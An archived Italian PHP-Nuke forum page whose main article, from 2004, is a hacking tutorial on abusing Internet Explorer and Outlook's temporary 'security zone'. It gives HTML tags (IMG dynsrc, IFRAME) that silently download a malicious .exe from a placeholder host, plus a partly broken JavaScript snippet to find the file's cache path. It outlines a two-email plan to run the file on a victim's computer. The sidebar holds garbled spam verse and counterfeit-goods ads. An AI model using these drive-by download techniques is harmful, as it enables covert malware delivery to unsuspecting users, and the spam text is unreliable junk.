Logo by Irenicus venerdì 10-feb-12 02:16
Menu
HOMEPAGE
News
Download
Forums (aiuto)
Sms d'amore

# Beneficenza
Cura malattie

# Partecipa
Inserisci news
Inserisci download
Ultime Forum

 it is comes to do so we did the thing
 en lugar dejará el efecto vender en un descuento grandemente
 The sand proclaims hand in hand the numerous artist,
 The subversion melts throughout in the artistic blood
 His driving swings the shed to let you be vigilant
 the directors of this group now.
 Official 2012 New Styles Ed Hardy Sunglasses AAA Quality
 2012 newest cheap Ed Hardy Men Hoody wholesale
 New Nike Air Yeezy Men Shoes with cheap price ,top quality
 2012 new styles Ed Hardy Sunglasses AAA Quality for sale

Raulken.it Forums
Info
Benvenuto, Anonimo
Nickname
Password
Security Code: Security Code
Type Security Code: (Registrare)
Complessivo: 102935
Persone Online:
Visitatori:
Iscritti: 277
Totale: 277
Annunci

Ricerca

 

Network
bittorrent
Ecommerce
Forum gratis free
free forum




ZONA INSICURA in Outlook & Explorer
ZONA INSICURA DI MICROSOFT



Internet explorer e outlook basano la propria sicurezza su un componente che definirei astuto nella sua astrusità.. si tratta di una "zona" del sistema dove vengono scaricate da internet tutti i files che compongono ad esempio una pagina.. immagini.. scripts.. testi e cosi via... quando infatti un utente apre un sito internet ad esempio l'intera pagina viene scaricata nella security zone così il browser puo’ aprirla comodamente..


quando infatti un utente apre un sito internet ad esempio l'intera pagina viene scaricata nella security zone così il browser puo’ aprirla comodamente.. essa è posta a cavallo tra internet e il sistema stesso.. un meccanismo questo che in apparenza pare ineccepibile ma lascia il fianco scoperto ad una serie di attacchi piuttosto pericolosi dato che questa dovendo memorizzare tutti i files inseriti in una pagina tiene in memoria anche files che potrebbero risultare maligni... un esempio molto semplice è quello dei download mascherati dai tag delle pagine html che permettono di far scaricare cose diverse da cio che si prospettava.. un semplice esempio è <IMG scr='http://www.sito.it/ti_ho_fottuto.exe'> Con questo exploitino si cerca di far scaricare da una pagina web un file tramite un tag utilizzato solitamente per le immagini come avrete immaginato..ma l'effetto di questo piccolo trucco non è quello che si era sperato.. dato che il browser purtroppo controlla che il tag si riferisca realmente ad una immagine.. ma proviamo a fare qualche cambiamento.. e scriviamo il nostro tag in questo modo: <IMG 'http://www.sito1.it/jessica.jpg' dynsrc=http://www.sito.it/stavolta_sei_fregato.exe> in questo caso l'immagine viene caricata ma nel contempo in modo silenzioso ed assolutamente invisibile all'utente viene scaricato anche il nostro file.. di questo trucco esistono infinite varianti.. basta saper utilizzare i tag giusti.. <IFRAME> è uno di questi.. per cui a questo punto siamo cosi riusciti ad infilare un file nel computer che ci interessa giusto?.. ma il file è ancora nella security zone per cui il computer attaccato non corre ancora nessun pericolo.. cosa dobbiamo fare adesso per riuscire ad attivarlo?.. studiamo un attimino come funziona la security zone...è praticamente una cartella di internet explorer e si comporta come una qualsiasi cartella con qualche minima eccezione.. il suo percorso è c:WINDOWSTemporary Internet FilesContent.IE5 e viene nascosta dal sistema operativo e non direttamente raggiungibile.. i files scaricati nella security zone vengono inseriti in cartelle temporanee con nomi generati in modo "casuale" (non è proprio casuale) dal computer per cui difficilmente rintracciabili.. qui sta il problema.. si.. il problema vero è proprio questo perchè impedisce ad una pagina web di conoscere l'esatta posizione di dove vengono scaricati i files nella security zone.. se noi sapessimo dove esattamente un file viene posto potremmo facilmente farlo eseguire in locale.. ma cmq noi non siamo completamente deficenti anche se il nostro cervello è un po in pappa per riuscire a trovare la soluzione.. lampo di genio.. javascript.. grandissimo linguaggio.. babbage benedica il suo creatore.. allora cominciamo a scriverci il nostro codicillo:   //catch local path of .exe file var url = document.location.href; var path1=url.substring(8,url.lenght-5)+"[1].exe //we need only the final path string //it starts from/Content.IE5/xxyyzz/ i=0 var found=false; var path2=""; while(i<path1.length) { if(path1.substring(i,i+2)=="/C") {found=true;} if(found) {path2=path2+path1.substring(i,i+1);} i++;}   (cmq devo precisare che questo script non l'ho scritto io ma l'ho copiato da un sito dedicato alla sicurezza.. non avevo nessuna voglia di sbattermi per scriverlo da 0) allora.. questo script risulta ottimo.. ha un unico problema.. deve essere eseguito in locale.. cioè.. non funziona via web ma deve essere inviato tramite email per funzionare.. fino ad ora abbiamo visto qualcosa di carino.. tiriamo le somme adesso. la nostra vittima riceve una email da noi opportunamente formattata in html coi tag per fargli scaricare il nostro fotti_utente quando siete sicuri che il nostro utente ha scaricato l'email da noi inviata ci creiamo la seconda email con il nostro codice in javascript per riuscire a scoprire il nome e la posizione del nostro file.. adesso abbiamo tutto in mano per riuscire a far eseguire il nostro file.. come fare?.. beh.. lo dovete scoprire da soli.. cosa devo inventarmi tutto io?









Staff raulken.it

lordream

Copyright © by Raulken.it All Right Reserved.

Pubblicato su: 2004-05-02 (3455 letture)

[ Indietro ]


PHP-Nuke Copyright © 2005 by Francisco Burzi. This is free software, and you may redistribute it under the GPL. PHP-Nuke comes with absolutely no warranty, for details, see the license.
Generazione pagina: 0.14 Secondi